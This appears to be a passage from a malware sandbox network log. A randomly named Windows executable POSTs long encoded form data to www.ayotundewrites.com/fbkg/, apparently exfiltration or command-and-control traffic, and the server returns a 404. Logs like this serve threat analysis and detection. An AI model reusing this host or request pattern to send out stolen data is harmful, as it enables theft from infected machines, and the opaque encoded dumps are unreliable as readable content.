0a 0d 0a
                                                                                                                                                                                                Data Ascii: 34cuTMo8WLumXtmmEM(rEhQC9Ohg=f7zKr{I_Xg<|N iy>C6&o5ggK*l(_&PU"+,)erNrZ&P2a|O(<:#PMVL+%sKV(gMzTeiH|N~mqY=Zq/6RWArS3VPQ:YF{eu9Z(ON(/?[e'':!}~bwPb&REy&dtY>J_M?7+vRJpX4Jj\NS|V;iHf4@_lMNHI<JhW8DPRd2V&Yd<vZ%#wEA:052&.6FH>Q=9Tc}h@!1WwC)D!2PyzRY'L<Juy/A-+~\66HfQ1O2(qJT,SR?@91^XazY2Q9BKZuQ]71rJ^J_FxvfTSGcFFdh8-zDahdAl FCno&|T%HHwO7,[7Dt50


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                53192.168.11.205018083.229.19.7680C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:59.410080910 CET1130OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.ayotundewrites.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.ayotundewrites.com
                                                                                                                                                                                                Referer: http://www.ayotundewrites.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 5a 73 50 41 7a 64 71 73 66 6a 63 32 59 5a 48 34 48 2f 55 44 59 33 6f 6c 61 77 33 49 4c 6b 69 74 46 45 6f 56 6d 49 43 42 61 5a 69 30 67 51 46 6d 6f 6e 50 4a 35 2b 77 56 6e 4c 76 4f 73 45 4b 72 43 43 52 2b 6b 34 6d 37 30 4a 63 4c 6c 6f 64 52 62 6c 73 63 72 48 4e 4c 59 61 4d 69 67 39 6f 6f 52 38 51 42 77 6e 39 46 58 6c 70 62 34 4e 77 44 56 70 2f 57 56 55 6a 42 64 31 72 46 6a 61 35 44 6c 37 78 78 51 69 77 76 2f 51 70 62 34 53 36 51 39 58 39 6c 4c 49 61 4c 56 55 4b 52 42 59 62 31 6d 6c 65 52 52 4d 72 51 51 6d 33 4b 36 57 79 36 65 6f 6e 56 56 58 62 66 2b 38 4c 58 76 70 62 69 33 61 68 68 4e 33 62 32 45 33 4f 30 79 7a 48 34 53 50 7a 56 54 76 71 61 51 2b 4b 79 6a 6a 6c 52 4e 58 77 69 67 7a 78 77 43 54 77 70 36 5a 61 47 4c 39 72 6e 79 77 36 78 54 2b 7a 2b 6a 73 56 72 47 55 39 64 4e 54 53 64 43 58 64 37 31 34 73 51 48 64 66 74 5a 50 52 54 33 66 48 65 53 62 79 73 61 71 62 69 35 4a 4e 4e 35 59 72 32 62 49 4b 37 6b 31 42 64 71 59 58 57 71 76 77 74 46 49 4d 4c 2b 57 76 52 78 4d 50 78 70 44 34 54 73 48 50 31 78 71 45 37 33 76 62 79 6d 4c 2f 54 6a 47 35 4e 50 51 66 6e 35 66 4f 4e 4f 38 61 48 35 66 4e 41 59 48 77 49 55 55 6f 77 6e 52 72 6b 53 74 30 59 45 66 33 76 71 5a 63 4c 5a 6f 46 49 68 68 65 32 32 4d 6b 6b 6d 53 67 39 6b 32 68 37 79 67 74 6f 59 36 7a 5a 57 43 7a 54 41 78 42 67 46 33 65 4a 6a 37 43 67 66 75 2f 6b 6d 58 79 7a 43 75 36 68 4c 78 6b 32 2b 65 76 36 52 31 5a 74 44 64 4a 61 34 55 73 44 2b 41 7a 73 62 2b 68 7a 41 37 5a 50 48 68 47 2b 4c 6c 76 43 76 41 54 74 6a 36 63 49 71 6d 51 58 49 75 35 42 30 51 39 44 54 36 48 37 59 56 48 2b 4f 6c 41 47 75 55 41 49 41 31 7a 43 62 65 74 44 75 6c 55 57 42 37 66 39 76 55 6f 52 67 4e 70 30 6f 67 2b 5a 74 62 43 77 76 79 6b 6a 79 6e 31 4d 44 4b 38 59 54 56 58 34 66 47 39 69 59 57 38 51 6b 30 5a 54 67 4e 48 37 54 57 2b 71 50 7a 5a 4a 6e 38 2f 7a 6e 71 7a 53 72 74 62 68 69 47 58 61 69 70 75 34 67 70 37 59 44 37 65 36 41 63 72 63 71 2f 47 48 61 46 4b 49 68 79 4a 73 4a 73 6b 34 38 54 7a 30 6a 53 49 6c 70 38 34 30 66 52 7a 57 44 2f 4f 63 49 34 67 52 6f 6b 35 78 59 64 64 57 62 2f 68 4b 47 52 53 78 58 67 68 4b 51 6e 58 73 68 58 72 6b 46 7a 4a 58 39 56 67 46 30 38 51 44 56 4f 34 39 49 74 36 4b 2b 44 69 63 74 75 79 6c 4d 6e 39 62 7a 36 45 72 39 36 4c 67 61 51 76 31 30 44 35 59 72 77 55 6a 37 6c 57 2b 70 70 4e 75 2f 74 52 69 41 65 2b 2f 79 37 44 51 45 6f 52 74 51 45 78 6d 58 37 58 49 67 66 56 2f 55 39 77 45 4d 6d 70 42 48 71 38 6d 64 6a 44 71 53 6e 43 39 4a 58 70 34 32 74 70 67 46 44 75 4f 52 32 48 31 4c 59 44 51 65 36 79 6e 4b 6a 4b 61 2b 57 71 2b 36 75 53 55 59 77 71 79 37 62 69 57 62 59 6f 70 56 58 32 4f 68 70 76 38 38 32 31 69 55 65 63 47 48 7a 41 34 36 64 53 6b 58 74 66 6f 45 68 68 39 58 48 47 69 72 75 31 4f 67 63 66 2b 76 39 36 76 7a 73 65 47 49 2f 45 6f 73 4f 44 34 77 76 76 35 42 6c 63 6f 2f 67 47 4a 48 77 35 65 71 46 62 34 2f 79 39 66 41 51 71 59 66 61 37 79 53 7a 46 4f 43 2f 7a 4d 69 59 4a 4d 35 76 6a 67 32 43 56 64 41 6e 64 69 57 4c 76 69 64 74 4a 41 38 44 45 55 35 70 43 4b 62 31 45 65 31 69 66 46 65 62 73 41 38 72 43 36 2f 33 35 75 38 44 76 62 2b 79 49 64 44 66 59 6f 30 75 47 2f 4e 2b 79 72 36 51 6b 4a 50 6b 33 46 6d 74 42 63 61 4e 62 49 64 61 56 66 6e 50 61 79 50 4e 67 51 38 58 4d 45 36 38 65 75 37 36 64 51 7a 6c 2f 2b 79 41 71 68 38 37 75 34 79 62 6c 54 74 53 67 54 4d 59 43 52 4c 50 64 65 6b 34 4b 55 4d 39 66 57 73 6c 71 68 46 36 71 55 79 43 44 50 59 62 42 42 7a 50 42 44 76 69 56 77 78 67 49 63 53 45 6e 56 76 59 5a 64 2b 70 75 7a 75 4e 6d 30 32 2b 75 42 53 71 51 4f 74 6b 72 79 6a 64 63 31 4f 35 4e 43 6d 73 30 56 67 79 75 78 70 47 58 78 78 79 76 6d 45 6f 51 76 56 33 59 79 33 77 68 76 2f 51 6e 4c 6a 53 75 67 50 51 74 37 76 79 64 58 31 6a 68 58 32 5a 64 4e 52 67 58 2f 68 71 63 56 57 61 6c 31 52 73 43 52 46 6c 4e 31 64 34 57 5a 51 61 52 62 4d 38 43 47 44 2f 30 4d 59 34 47 47 62 4f 31 68 76 4a 4e 44 6c 53 74 46 62 4f 35 4d 69 77 59 50 6c 55 65 52 44 34 64 32 30 61 79 77 6b 72 70 46 61 75 54 77 44 62 2b 64 44 4c 4c 6f 5a 6e 76 78 6b 4f 44 6e 34 63 47 4e 71 62 43 4d 74 79 55 64 58 62 44 66 2b 44 44 6d 36 71 49 6a 4b 51 6e 41 6a 74 39 45 61 39 71 78 33 57 2b 58 58 50 6d 41 5a 69 47
                                                                                                                                                                                                Data Ascii: T6I=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
                                                                                                                                                                                                Nov 17, 2023 19:30:59.594084978 CET1133OUTData Raw: 57 57 4c 51 58 4f 47 35 44 64 75 63 62 55 45 73 7a 52 2f 37 78 43 2b 72 63 64 59 72 4f 75 31 4a 50 32 59 71 6d 48 72 52 4f 78 4f 47 4f 50 78 71 54 5a 64 44 44 54 4a 54 59 51 4a 38 46 51 47 68 73 66 74 71 4f 56 6d 4f 73 37 7a 45 33 4a 6c 6a 66 71
                                                                                                                                                                                                Data Ascii: WWLQXOG5DducbUEszR/7xC+rcdYrOu1JP2YqmHrROxOGOPxqTZdDDTJTYQJ8FQGhsftqOVmOs7zE3JljfqjBKkoVOtA+k30t6sIH73Lxwh8pbuoziwgRIeMBrFmNGBC7dkqoVHm08zPTd12h7jHUbnLsn/aVeS8wbASb1maNN8zBjnR9L8hnKtKeN1EeJ+b06C7bnsIruVt/TF3F/SZk03aqGxaiP1LZwuFKICnnBhJlHysPp6q
                                                                                                                                                                                                Nov 17, 2023 19:30:59.594329119 CET1135OUTData Raw: 56 32 46 2f 43 66 48 64 59 70 47 35 70 54 32 72 2f 2f 65 73 6f 31 31 33 79 66 39 70 47 30 6a 73 69 55 78 73 67 79 32 32 61 53 76 37 44 36 57 37 35 47 4c 55 79 6c 76 4d 4d 54 44 4c 64 5a 6c 65 4e 70 6f 54 61 6e 53 57 46 63 33 6c 61 75 32 6a 77 39
                                                                                                                                                                                                Data Ascii: V2F/CfHdYpG5pT2r//eso113yf9pG0jsiUxsgy22aSv7D6W75GLUylvMMTDLdZleNpoTanSWFc3lau2jw9UfW/tFJ0CPgOyPACDU+NL1StQC2J8ZZWVvA6xvZWkYASFnCdDeuaP5NhZb0TkezTCbsmGpHwXpea1ZGOcG2o3BFS/yNig94fguqir1TyZ68Xv1OByIz79JefRfB/Kbr2X1qUDaWxe5bvGGp/Z6NZwb4nFqmt934oZ
                                                                                                                                                                                                Nov 17, 2023 19:30:59.594504118 CET1143OUTData Raw: 62 63 7a 35 4f 50 72 77 73 36 74 36 37 4b 44 33 33 74 30 36 68 78 48 4a 72 37 6a 55 57 70 6e 6b 35 63 79 58 44 6a 75 53 49 74 7a 70 76 6b 6a 37 35 6b 4d 55 39 4a 68 30 6b 31 4e 6f 4e 66 43 30 71 46 77 41 6a 42 6a 30 49 34 52 71 52 58 52 70 66 45
                                                                                                                                                                                                Data Ascii: bcz5OPrws6t67KD33t06hxHJr7jUWpnk5cyXDjuSItzpvkj75kMU9Jh0k1NoNfC0qFwAjBj0I4RqRXRpfEwGG9ARoT0ubCF9dbfzrE/sC4pbXaewFwcYIb2rGTF8sul+pIvFDaZH7X+5jTDYuUog0EoD2oMMj9s2VbmOWFaWuEd5dfrB0xv5N7H+Li13cQHuVWaH/zhxEfY6zhkkghlG/EtAhaZl/kXkeMLe3aF5Kj1sY8hJjRE
                                                                                                                                                                                                Nov 17, 2023 19:30:59.594667912 CET1145OUTData Raw: 37 4d 48 58 39 30 75 73 35 65 63 2f 4b 69 2b 41 30 47 54 56 73 63 75 76 65 39 34 52 73 36 64 57 67 69 76 79 73 79 6d 6b 66 5a 4b 43 57 48 39 38 4a 6f 72 54 6c 70 6f 4d 4e 68 7a 64 70 5a 6c 4f 33 4b 66 6c 32 65 2b 44 73 41 74 42 4f 54 6b 30 43 73
                                                                                                                                                                                                Data Ascii: 7MHX90us5ec/Ki+A0GTVscuve94Rs6dWgivysymkfZKCWH98JorTlpoMNhzdpZlO3Kfl2e+DsAtBOTk0Csx6HnvT40gmub1u9LOE8DDclEdpO+X8m9g2SP6mwVP5/8FX9T3hairzdkq8gvKN9Nmw1eLaebVmOUKSebsHNJAHXBTYJyf5/z0rBtphw6Gn31ggXBP1MXu3yiqIVx1FMhQypxI8px77MQlWjez6JRAj9JqnZihSa/x
                                                                                                                                                                                                Nov 17, 2023 19:30:59.595024109 CET1156OUTData Raw: 33 44 77 51 43 4d 34 77 61 6c 7a 64 42 44 6c 67 63 47 45 47 58 64 4c 6b 4e 56 2b 31 75 51 7a 71 7a 79 37 2f 75 78 33 79 78 2f 4e 56 58 78 50 61 63 68 77 34 56 61 43 41 77 49 62 51 75 78 49 73 6a 4e 67 31 70 34 73 34 7a 76 64 65 6e 6f 56 58 59 41
                                                                                                                                                                                                Data Ascii: 3DwQCM4walzdBDlgcGEGXdLkNV+1uQzqzy7/ux3yx/NVXxPachw4VaCAwIbQuxIsjNg1p4s4zvdenoVXYAE9wM/hrAgmQooKDj0EXaijT5IGH0NRewC1yAzzKfJ9IrwkWvPMv0nCtD88gTqS4O8yQij4auhIThCFEtkQiEZbjMiWZzvXjg2IV/6NvXwK2/vP2e61B25yEBSbT/cet/Xtzy8DwOqyYM+Df4gvkrY/BtqXoNTBKQF
                                                                                                                                                                                                Nov 17, 2023 19:30:59.778086901 CET1158OUTData Raw: 2f 37 48 35 57 41 73 44 67 39 51 6c 6d 6e 4c 30 33 4f 6b 56 41 6a 2f 75 2f 31 4d 34 76 50 38 2f 49 49 74 41 43 72 54 68 5a 53 7a 48 53 66 51 30 63 70 6f 62 43 78 56 50 4a 6c 71 53 55 6f 75 68 59 38 6a 75 73 79 32 6c 7a 2b 36 38 54 73 37 50 48 55
                                                                                                                                                                                                Data Ascii: /7H5WAsDg9QlmnL03OkVAj/u/1M4vP8/IItACrThZSzHSfQ0cpobCxVPJlqSUouhY8jusy2lz+68Ts7PHUGPVgVoIyxSljdHkMzvViRI2UskdNNC01PTPHrnTw/RKS7s+gErZawF3TZUznVBweMF3NR1Gl/D9/QIyl2+TPmpEulNmkU9zE6yRFyFmXFCuO5wNNsrtptBfowZtnBeY0uzGcDSpKwlTeoBRtw3pehw8odcYNFCtYL
                                                                                                                                                                                                Nov 17, 2023 19:30:59.778242111 CET1161OUTData Raw: 37 4d 70 6e 58 64 47 34 54 52 4c 62 6e 45 47 75 77 42 6d 69 56 33 47 37 37 45 72 45 69 67 47 53 68 78 65 61 6a 4b 4a 62 38 35 58 50 39 37 47 67 6c 51 6e 56 49 66 71 32 55 71 42 58 66 59 73 47 58 37 67 6b 47 61 4d 76 47 59 55 4f 44 42 4e 30 7a 56
                                                                                                                                                                                                Data Ascii: 7MpnXdG4TRLbnEGuwBmiV3G77ErEigGShxeajKJb85XP97GglQnVIfq2UqBXfYsGX7gkGaMvGYUODBN0zVe53C/DeHSFILDR2H4H43jymunv8zQ/op7EyoMdzat4HT//sT5deOQ3R2hId0v71PBEPmD0BSxG2YLzQhhbxUT/7yeVzMs+khHaZoYQXbeaPYymjkHYCb4VIrjjwUo70DVW7nAPE/47NZubCPwiaTjjrZnObLz4YMY
                                                                                                                                                                                                Nov 17, 2023 19:30:59.778574944 CET1162OUTData Raw: 48 49 33 46 58 73 55 4a 69 33 47 62 5a 41 32 56 6b 46 78 4f 6b 44 6b 4b 50 50 52 55 56 4d 53 4d 57 78 57 6f 57 73 6e 48 33 55 69 42 32 68 33 69 71 4b 55 4a 52 6a 2f 64 32 6e 51 34 59 63 37 2f 72 6b 6f 38 71 4f 6e 79 42 46 66 73 62 51 31 36 78 44
                                                                                                                                                                                                Data Ascii: HI3FXsUJi3GbZA2VkFxOkDkKPPRUVMSMWxWoWsnH3UiB2h3iqKUJRj/d2nQ4Yc7/rko8qOnyBFfsbQ16xDlvy0x3oZatXKmCAbxwrSFzQDx8kscRPYPn4ZzpUywQpFxmSN41HOT35teDTsxiYpW2hLoVBr0Ttq0wuqk8q6epMrwPhu4WVckWwrbG6ExAsIg0kpTyCvFtqsG0csUZrBoOTcVxu+5fWosV3uE8F+IIvUPT2Uy3Qn0
                                                                                                                                                                                                Nov 17, 2023 19:30:59.778985023 CET1164OUTData Raw: 65 68 61 77 32 2f 48 45 45 50 4b 71 32 7a 67 6c 34 4c 7a 77 35 6f 39 59 64 67 4d 78 46 35 4e 4b 5a 66 78 2f 51 68 6f 56 57 6a 51 36 73 62 77 52 76 53 72 44 6f 66 43 42 64 4d 59 56 74 33 53 78 6c 62 7a 72 45 58 74 48 75 6c 75 4d 44 4f 63 39 56 4f
                                                                                                                                                                                                Data Ascii: ehaw2/HEEPKq2zgl4Lzw5o9YdgMxF5NKZfx/QhoVWjQ6sbwRvSrDofCBdMYVt3SxlbzrEXtHuluMDOc9VOpZmRe2V2I0GhEL0OVGH/mFshBdlPUsdXYXO5+7uz7KzoQfq5zkaguhrSc/LXoRa7yOOKZx1ZDSco7nDfBjaIVnUbftpAMkM0rpTZJ1pfG4sLvScqwsmBiDYm453x9z9xpJF9G+H4usdLxhBEfaCOMfvEeMJE7DhdD
                                                                                                                                                                                                Nov 17, 2023 19:30:59.779154062 CET1166OUTData Raw: 33 71 58 63 38 77 6d 2b 67 68 45 72 4d 36 76 37 71 39 39 41 48 50 49 69 4d 58 74 48 6d 6a 64 5a 44 71 35 47 37 4f 31 67 4d 4b 2b 39 71 6b 69 64 57 47 63 39 54 69 54 7a 59 73 47 67 54 76 44 37 45 61 41 75 36 4d 71 35 46 77 66 7a 58 56 39 6f 78 76
                                                                                                                                                                                                Data Ascii: 3qXc8wm+ghErM6v7q99AHPIiMXtHmjdZDq5G7O1gMK+9qkidWGc9TiTzYsGgTvD7EaAu6Mq5FwfzXV9oxvHTv/JrbCD+Iny8yA1ZWNl5fguRvfUjy/SeS/Ow4/aTAt6g47rvHNDSXSpyGCI4iVAdqHEyv36g+AGGuGJCJSSQVgHrxB5wMsvH0J6lr3AiCMaBS9ek8Gn0D3qvNnvCguw1e92v06pBJ0nzqq0Z8eRs6GctK3nbh/s
                                                                                                                                                                                                Nov 17, 2023 19:31:00.145225048 CET1174INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:31:00 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                Data Raw: 33 34 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 92 9a 6d 16 58 74 6d 03 6d ec 45 0c a4 4d 90 a8 28 72 a4 a5 91 45 84 e2 68 c9 51 14 01 fd 43 39 ef 4f c8 1f db a1 68 67 d3 8f 3d d1 a4 e6 bd 99 f7 66 c6 8b 37 eb ab f3 e2 ee 7a 03 17 c5 a7 4b b8 fe f2 f1 72 7b 0e 49 9a e7 5f df 9d e7 f9 ba 58 c7 0f 67 d9 db d3 3c df 7c 4e 20 69 98 bb f7 79 3e 0c 43 36 bc cb c8 ed f3 e2 26 6f b8 35 67 b9 67 a7 4b ce 2a ae 92 d5 6c 11 de c0 28 bb 5f 26 b5 9b 1e 50 55 f2 de 22 2b 08 2c 29 fe dd eb 87 65 72 4e 96 d1 72 5a 8c 1d 26 50 c6 db 32 61 7c e4 89 f8 4f 28 1b e5 3c f2 b2 e7 3a fd 23 50 4d 1c 56 b5 b8 4c 1c ed 88 fd 2b 9c 25 8b 73 4b da 56 f8 28 67 4d c6 d0 f0 02 7a 9d b8 54 65 83 69 48 e8 c8 7c c7 90 4e 9f 7e 09 ea 9c da b7 ea 7f a2 8b 6d 71 b9 59 9d bd 3d 83 cf c4 f0 17 f5 b6 5a e4 f1 71 b6 c8 2f 36 1f d6 52 fc c7 ab f5 9d 1c 17 a7 ab 57 41 72 9b 15 0d 82 13 53 d0 33 56 50 51 d9 b7 e2 0b 0c ca 83 15 ba 3a d0 01 59 e0 46 7b f0 e8 1e d0 65 b3 c5 75 e0 ba 39 12 5a 28 1c f5 0f cf 4f 92 4e 28 2f f1 3f 9e 0a 5b 65 ab e7 27 b0 27 0a 3a 21 7d 7e 62 b9 89 f8 10 0f be 77 50 62 e4 ed 7f 26 86 8d 9d 9c 52 15 45 ea 8d 79 a1 26 f0 64 74 a9 59 3e 4a a9 c2 01 18 a3 9f ff 91 5f 10 04 4d c4 ba a2 ef 98 3f ac d7 37 9b db db d5 ec 2b ee e0 76 52 04 4a 14 cb 70 a9 91 58 f4 e2 e0 34 a3 cf 4a 6a 01 be 01 5c d3 80 4e dc d9 8d 53 94 19 7c 56 3b f1 f6 85 69 91 1f fc cd c3 48 af 66 b3 c5 9b 34 9d 01 40 0a 5f 6c 4d 4e 48 15 a3 19 e7 f0 49 97 8e 3c d5 0c 8d 98 a1 aa 4a 68 15 94 06 c5 57 b0 38 44 50 52 a3 e2 de c9 64 32 c1 56 26 d5 59 64 d8 3c 76 86 9c f8 0f db 5a fa 81 10 a6 15 a8 8e 18 25 92 9d 23 77 e2 a1 45 ef d5 1e 41 3a 96 30 89 35 ad 32 26 99 83 ef b0 d4 b5 2e e5 36 46 90 91 48 a1 12 ec ef a7 bf 89 3e 51 3d ff 39 a1 0c 88 54 63 7d c4 68 f6 40 c3 21 db 31 57 06 77 d4 43 29 44 21 32 50 86 ca ea 79 84 ec 7a 06 cd 52 59 27 4c 3c 4a fb 75 79 2f 07 41 2d 2b 03 7e d0 5c 36 82 36 06 ab 88 48 a4 66 c7 51 d1 31 87 4f 32 28 02 71 8b ca 4a 9d 54 cb e2 f6 b2 a4 87 2c 53 52 df 88 dd 3f e0 40 39 94 31 b3 5e dc 9b ba 58 61 ad 7a c3 59 cc b5 dd de 82 32 83 1a fd 51 e8 8f f8 89 39 90 18 b2 fb 08 42 4b fd be 09 12 5a 75 8f bf f0 ac 51 5d 37 86 82 31 02 06 72 f7 4a c6 5e f4 4a 5f 0e 46 78 dd 76 06 df cb 66 54 53 47 a7 0e c6 f8 63 13 c5 9b 46 46 64 a7 f7 a2 b6 9d 96 d3 68 c9 38 2d a4 a4 ef 7a df 88 b9 11 44 61 8c c2 68 d4 fa 01 a1 91 64 41 b1 6c 20 f0 80 46 9e a6 16 43 ab ad 6e fb f6 a0 ff ea c5 c7 a9 6f d2 26 7c 54 25 1b 99 f6 e0 f6 48 fd 89 48 77 f2 4f aa 8f ea 9d de 37 2c 5b 37 44 8a 74 35 fb 17 f8 f5 91 1f d6 05 00 00 0d 